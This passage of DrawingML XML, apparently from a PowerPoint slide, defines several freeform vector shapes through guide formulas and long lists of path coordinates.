                    <a:gd name="T109" fmla="*/ 473 h 616"/>
                    <a:gd name="T110" fmla="*/ 352 w 563"/>
                    <a:gd name="T111" fmla="*/ 447 h 616"/>
                    <a:gd name="T112" fmla="*/ 357 w 563"/>
                    <a:gd name="T113" fmla="*/ 431 h 616"/>
                    <a:gd name="T114" fmla="*/ 357 w 563"/>
                    <a:gd name="T115" fmla="*/ 415 h 616"/>
                    <a:gd name="T116" fmla="*/ 352 w 563"/>
                    <a:gd name="T117" fmla="*/ 373 h 616"/>
                    <a:gd name="T118" fmla="*/ 310 w 563"/>
                    <a:gd name="T119" fmla="*/ 274 h 6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563" h="616">
                      <a:moveTo>
                        <a:pt x="21" y="268"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="21" y="268"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="153"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="37" y="90"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="63" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="63" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="95" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="32"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="299" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="27"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="48"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="368" y="74"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="106"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="499" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="562" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="436" y="525"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="505"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="415" y="505"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="373" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="363" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="609"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="615"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="615"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="609"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="594"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="594"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="578"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="557"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="536"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="105" y="510"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="84" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="89" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="100" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="337"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="116" y="337"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="315"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="163" y="289"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="252" y="221"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="200"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="242" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="221" y="116"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="111"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="168" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="147"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="132" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="137" y="216"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="142" y="226"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="279"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="21" y="268"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="284" y="305"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="284" y="305"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="263" y="326"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="352"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="216" y="405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="226" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="236" y="468"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="484"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="268" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="279" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="289" y="494"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="305" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="447"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="447"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="431"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="357" y="394"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="352" y="373"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="310" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="284" y="30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2" name="Freeform 57"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6108700" y="5975350"/>
                  <a:ext cx="165100" cy="263525"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 127 w 458"/>
                    <a:gd name="T1" fmla="*/ 0 h 731"/>
                    <a:gd name="T2" fmla="*/ 457 w 458"/>
                    <a:gd name="T3" fmla="*/ 661 h 731"/>
                    <a:gd name="T4" fmla="*/ 331 w 458"/>
                    <a:gd name="T5" fmla="*/ 730 h 731"/>
                    <a:gd name="T6" fmla="*/ 0 w 458"/>
                    <a:gd name="T7" fmla="*/ 62 h 731"/>
                    <a:gd name="T8" fmla="*/ 127 w 458"/>
                    <a:gd name="T9" fmla="*/ 0 h 7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8" h="731">
                      <a:moveTo>
                        <a:pt x="127" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="457" y="661"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="331" y="730"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="62"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="127" y="0"/>
                      </a:ln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3" name="Freeform 58"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6202363" y="5897563"/>
                  <a:ext cx="287337" cy="282575"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 126 w 799"/>
                    <a:gd name="T1" fmla="*/ 288 h 783"/>
                    <a:gd name="T2" fmla="*/ 383 w 799"/>
                    <a:gd name="T3" fmla="*/ 598 h 783"/>
                    <a:gd name="T4" fmla="*/ 383 w 799"/>
                    <a:gd name="T5" fmla="*/ 598 h 783"/>
                    <a:gd name="T6" fmla="*/ 241 w 799"/>
                    <a:gd name="T7" fmla="*/ 220 h 783"/>
                    <a:gd name="T8" fmla="*/ 378 w 799"/>
                    <a:gd name="T9" fmla="*/ 141 h 783"/>
                    <a:gd name="T10" fmla="*/ 640 w 799"/>
                    <a:gd name="T11" fmla="*/ 446 h 783"/>
                    <a:gd name="T12" fmla="*/ 646 w 799"/>
                    <a:gd name="T13" fmla="*/ 446 h 783"/>
                    <a:gd name="T14" fmla="*/ 504 w 799"/>
                    <a:gd name="T15" fmla="*/ 68 h 783"/>
                    <a:gd name="T16" fmla="*/ 619 w 799"/>
                    <a:gd name="T17" fmla="*/ 0 h 783"/>
                    <a:gd name="T18" fmla="*/ 798 w 799"/>
                    <a:gd name="T19" fmla="*/ 541 h 783"/>
                    <a:gd name="T20" fmla="*/ 656 w 799"/>
                    <a:gd name="T21" fmla="*/ 624 h 783"/>
                    <a:gd name="T22" fmla="*/ 394 w 799"/>
                    <a:gd name="T23" fmla="*/ 320 h 783"/>
                    <a:gd name="T24" fmla="*/ 388 w 799"/>
                    <a:gd name="T25" fmla="*/ 320 h 783"/>
                    <a:gd name="T26" fmla="*/ 530 w 799"/>
                    <a:gd name="T27" fmla="*/ 698 h 783"/>
                    <a:gd name="T28" fmla="*/ 388 w 799"/>
                    <a:gd name="T29" fmla="*/ 782 h 783"/>
                    <a:gd name="T30" fmla="*/ 0 w 799"/>
                    <a:gd name="T31" fmla="*/ 362 h 783"/>
                    <a:gd name="T32" fmla="*/ 126 w 799"/>
                    <a:gd name="T33" fmla="*/ 288 h 7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799" h="783">
                      <a:moveTo>
                        <a:pt x="126" y="288"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="383" y="598"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="383" y="598"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="220"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="378" y="141"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="640" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="646" y="446"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="504" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="619" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="798" y="541"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="656" y="624"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="394" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="530" y="698"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="388" y="782"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="362"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="288"/>
                      </a:ln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4" name="Freeform 59"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="6457950" y="5819775"/>
                  <a:ext cx="219075" cy="220663"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 37 w 609"/>
                    <a:gd name="T1" fmla="*/ 310 h 611"/>
                    <a:gd name="T2" fmla="*/ 5 w 609"/>
                    <a:gd name="T3" fmla="*/ 236 h 611"/>
                    <a:gd name="T4" fmla="*/ 0 w 609"/>
                    <a:gd name="T5" fmla="*/ 199 h 611"/>
                    <a:gd name="T6" fmla="*/ 10 w 609"/>
                    <a:gd name="T7" fmla="*/ 169 h 611"/>
                    <a:gd name="T8" fmla="*/ 41 w 609"/>
                    <a:gd name="T9" fmla="*/ 110 h 611"/>
                    <a:gd name="T10" fmla="*/ 67 w 609"/>
                    <a:gd name="T11" fmla="*/ 84 h 611"/>
                    <a:gd name="T12" fmla="*/ 99 w 609"/>
                    <a:gd name="T13" fmla="*/ 58 h 611"/>
                    <a:gd name="T14" fmla="*/ 194 w 609"/>
                    <a:gd name="T15" fmla="*/ 5 h 611"/>
                    <a:gd name="T16" fmla="*/ 231 w 609"/>
                    <a:gd name="T17" fmla="*/ 0 h 611"/>
                    <a:gd name="T18" fmla="*/ 262 w 609"/>
                    <a:gd name="T19" fmla="*/ 0 h 611"/>
                    <a:gd name="T20" fmla="*/ 320 w 609"/>
                    <a:gd name="T21" fmla="*/ 26 h 611"/>
                    <a:gd name="T22" fmla="*/ 341 w 609"/>
                    <a:gd name="T23" fmla="*/ 52 h 611"/>
                    <a:gd name="T24" fmla="*/ 535 w 609"/>
                    <a:gd name="T25" fmla="*/ 320 h 611"/>
                    <a:gd name="T26" fmla="*/ 572 w 609"/>
                    <a:gd name="T27" fmla="*/ 368 h 611"/>
                    <a:gd name="T28" fmla="*/ 608 w 609"/>
                    <a:gd name="T29" fmla="*/ 399 h 611"/>
                    <a:gd name="T30" fmla="*/ 498 w 609"/>
                    <a:gd name="T31" fmla="*/ 478 h 611"/>
                    <a:gd name="T32" fmla="*/ 472 w 609"/>
                    <a:gd name="T33" fmla="*/ 463 h 611"/>
                    <a:gd name="T34" fmla="*/ 446 w 609"/>
                    <a:gd name="T35" fmla="*/ 441 h 611"/>
                    <a:gd name="T36" fmla="*/ 446 w 609"/>
                    <a:gd name="T37" fmla="*/ 489 h 611"/>
                    <a:gd name="T38" fmla="*/ 435 w 609"/>
                    <a:gd name="T39" fmla="*/ 520 h 611"/>
                    <a:gd name="T40" fmla="*/ 409 w 609"/>
                    <a:gd name="T41" fmla="*/ 552 h 611"/>
                    <a:gd name="T42" fmla="*/ 372 w 609"/>
                    <a:gd name="T43" fmla="*/ 583 h 611"/>
                    <a:gd name="T44" fmla="*/ 314 w 609"/>
                    <a:gd name="T45" fmla="*/ 610 h 611"/>
                    <a:gd name="T46" fmla="*/ 283 w 609"/>
                    <a:gd name="T47" fmla="*/ 610 h 611"/>
                    <a:gd name="T48" fmla="*/ 257 w 609"/>
                    <a:gd name="T49" fmla="*/ 604 h 611"/>
                    <a:gd name="T50" fmla="*/ 210 w 609"/>
                    <a:gd name="T51" fmla="*/ 573 h 611"/>
                    <a:gd name="T52" fmla="*/ 188 w 609"/>
                    <a:gd name="T53" fmla="*/ 552 h 611"/>
                    <a:gd name="T54" fmla="*/ 173 w 609"/>
                    <a:gd name="T55" fmla="*/ 530 h 611"/>
                    <a:gd name="T56" fmla="*/ 141 w 609"/>
                    <a:gd name="T57" fmla="*/ 473 h 611"/>
                    <a:gd name="T58" fmla="*/ 131 w 609"/>
                    <a:gd name="T59" fmla="*/ 441 h 611"/>
                    <a:gd name="T60" fmla="*/ 131 w 609"/>
                    <a:gd name="T61" fmla="*/ 415 h 611"/>
                    <a:gd name="T62" fmla="*/ 147 w 609"/>
                    <a:gd name="T63" fmla="*/ 363 h 611"/>
                    <a:gd name="T64" fmla="*/ 162 w 609"/>
                    <a:gd name="T65" fmla="*/ 336 h 611"/>
                    <a:gd name="T66" fmla="*/ 241 w 609"/>
                    <a:gd name="T67" fmla="*/ 242 h 611"/>
                    <a:gd name="T68" fmla="*/ 257 w 609"/>
                    <a:gd name="T69" fmla="*/ 216 h 611"/>
                    <a:gd name="T70" fmla="*/ 262 w 609"/>
                    <a:gd name="T71" fmla="*/ 199 h 611"/>
                    <a:gd name="T72" fmla="*/ 246 w 609"/>
                    <a:gd name="T73" fmla="*/ 158 h 611"/>
                    <a:gd name="T74" fmla="*/ 231 w 609"/>
                    <a:gd name="T75" fmla="*/ 132 h 611"/>
                    <a:gd name="T76" fmla="*/ 210 w 609"/>
                    <a:gd name="T77" fmla="*/ 121 h 611"/>
                    <a:gd name="T78" fmla="*/ 184 w 609"/>
                    <a:gd name="T79" fmla="*/ 121 h 611"/>
                    <a:gd name="T80" fmla="*/ 157 w 609"/>
                    <a:gd name="T81" fmla="*/ 137 h 611"/>
                    <a:gd name="T82" fmla="*/ 126 w 609"/>
                    <a:gd name="T83" fmla="*/ 169 h 611"/>
                    <a:gd name="T84" fmla="*/ 126 w 609"/>
                    <a:gd name="T85" fmla="*/ 184 h 611"/>
                    <a:gd name="T86" fmla="*/ 141 w 609"/>
                    <a:gd name="T87" fmla="*/ 236 h 611"/>
                    <a:gd name="T88" fmla="*/ 47 w 609"/>
                    <a:gd name="T89" fmla="*/ 320 h 611"/>
                    <a:gd name="T90" fmla="*/ 309 w 609"/>
                    <a:gd name="T91" fmla="*/ 294 h 611"/>
                    <a:gd name="T92" fmla="*/ 288 w 609"/>
                    <a:gd name="T93" fmla="*/ 320 h 611"/>
                    <a:gd name="T94" fmla="*/ 267 w 609"/>
                    <a:gd name="T95" fmla="*/ 352 h 611"/>
                    <a:gd name="T96" fmla="*/ 257 w 609"/>
                    <a:gd name="T97" fmla="*/ 378 h 611"/>
                    <a:gd name="T98" fmla="*/ 273 w 609"/>
                    <a:gd name="T99" fmla="*/ 441 h 611"/>
                    <a:gd name="T100" fmla="*/ 294 w 609"/>
                    <a:gd name="T101" fmla="*/ 463 h 611"/>
                    <a:gd name="T102" fmla="*/ 314 w 609"/>
                    <a:gd name="T103" fmla="*/ 478 h 611"/>
                    <a:gd name="T104" fmla="*/ 341 w 609"/>
                    <a:gd name="T105" fmla="*/ 483 h 611"/>
                    <a:gd name="T106" fmla="*/ 362 w 609"/>
                    <a:gd name="T107" fmla="*/ 473 h 611"/>
                    <a:gd name="T108" fmla="*/ 388 w 609"/>
                    <a:gd name="T109" fmla="*/ 452 h 611"/>
                    <a:gd name="T110" fmla="*/ 398 w 609"/>
                    <a:gd name="T111" fmla="*/ 420 h 611"/>
                    <a:gd name="T112" fmla="*/ 404 w 609"/>
                    <a:gd name="T113" fmla="*/ 405 h 611"/>
                    <a:gd name="T114" fmla="*/ 404 w 609"/>
                    <a:gd name="T115" fmla="*/ 389 h 611"/>
                    <a:gd name="T116" fmla="*/ 388 w 609"/>
                    <a:gd name="T117" fmla="*/ 352 h 611"/>
                    <a:gd name="T118" fmla="*/ 320 w 609"/>
                    <a:gd name="T119" fmla="*/ 258 h 6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609" h="611">
                      <a:moveTo>
                        <a:pt x="37" y="310"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="37" y="310"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15" y="273"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="5" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="41" y="110"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="67" y="84"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="99" y="58"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="5"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="294" y="11"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="320" y="26"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="52"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="362" y="79"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="535" y="320"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="572" y="368"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="608" y="399"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="498" y="478"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="472" y="463"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="451" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="446" y="489"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="441" y="504"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="435" y="520"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="409" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="583"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="372" y="583"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="341" y="599"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="314" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="283" y="610"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="604"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="588"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="573"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="573"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="552"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="173" y="530"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="499"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="473"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="441"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="415"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="389"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="147" y="363"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="162" y="336"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="188" y="305"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="241" y="242"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="216"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="199"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="262" y="179"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="246" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="231" y="132"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="210" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="194" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="184" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="157" y="137"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="136" y="158"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="169"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="126" y="184"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="131" y="210"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="141" y="236"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="152" y="247"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="320"/>
                      </a:lnTo>
